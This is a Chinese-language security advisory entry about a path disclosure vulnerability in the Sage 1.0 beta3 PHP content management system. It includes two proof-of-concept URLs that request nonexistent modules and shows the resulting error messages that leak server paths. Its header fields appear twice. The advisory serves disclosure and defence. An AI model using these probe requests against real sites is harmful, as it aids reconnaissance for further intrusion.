Sage内容管理系统路径泄露漏洞
添加时间:
2005-08-15
系统编号:
WAVDB-00325
BUGTRAQ: 6893
影响版本:
Sage 1.0 beta3
程序介绍:
漏洞利用:
解决方案:
厂商补丁:
Sage
----
目前厂商还没有提供补丁或者升级程序,我们建议使用此软件的用户随时关注厂商的主页以获取最新版本:
http://sage.dev.box.sk/
信息来源:
<*来源:euronymous (just-a-user@yandex.ru)
链接:http://marc.theaimsgroup.com/?l=bugtraq&m=104575673009239&w=2
*>
2005-08-15
系统编号:
WAVDB-00325
BUGTRAQ: 6893
影响版本:
Sage 1.0 beta3
程序介绍:
Sage是一款由PHP编写的内容管理系统。
漏洞分析:
Sage不正确处理不存在的模块请求,远程攻击者可以利用这个漏洞获得Sage安装目录路径信息。
攻击者提交不存在的模块名请求,可导致系统返回包含Sage安装目录路径的敏感信息,攻击者可以根据这些信息进一步对系统进行攻击。
漏洞利用:
http://hostname/?mod=some_thing&op=browse
这里的'some_thing'是一个不存在的模块名:
===================================================
Fatal error: Cannot instantiate non-existent class:
module_some_thing
in /home/aztek/libraries/module.inc.php on line 62
===================================================
或者其他方法为:
http://hostname/?mod=node&nid=some_thing&op=view
===================================================
Access Denied
/home/aztek/modules/node.module.php:71
===================================================
解决方案:
厂商补丁:
Sage
----
目前厂商还没有提供补丁或者升级程序,我们建议使用此软件的用户随时关注厂商的主页以获取最新版本:
http://sage.dev.box.sk/
信息来源:
<*来源:euronymous (just-a-user@yandex.ru)
链接:http://marc.theaimsgroup.com/?l=bugtraq&m=104575673009239&w=2
*>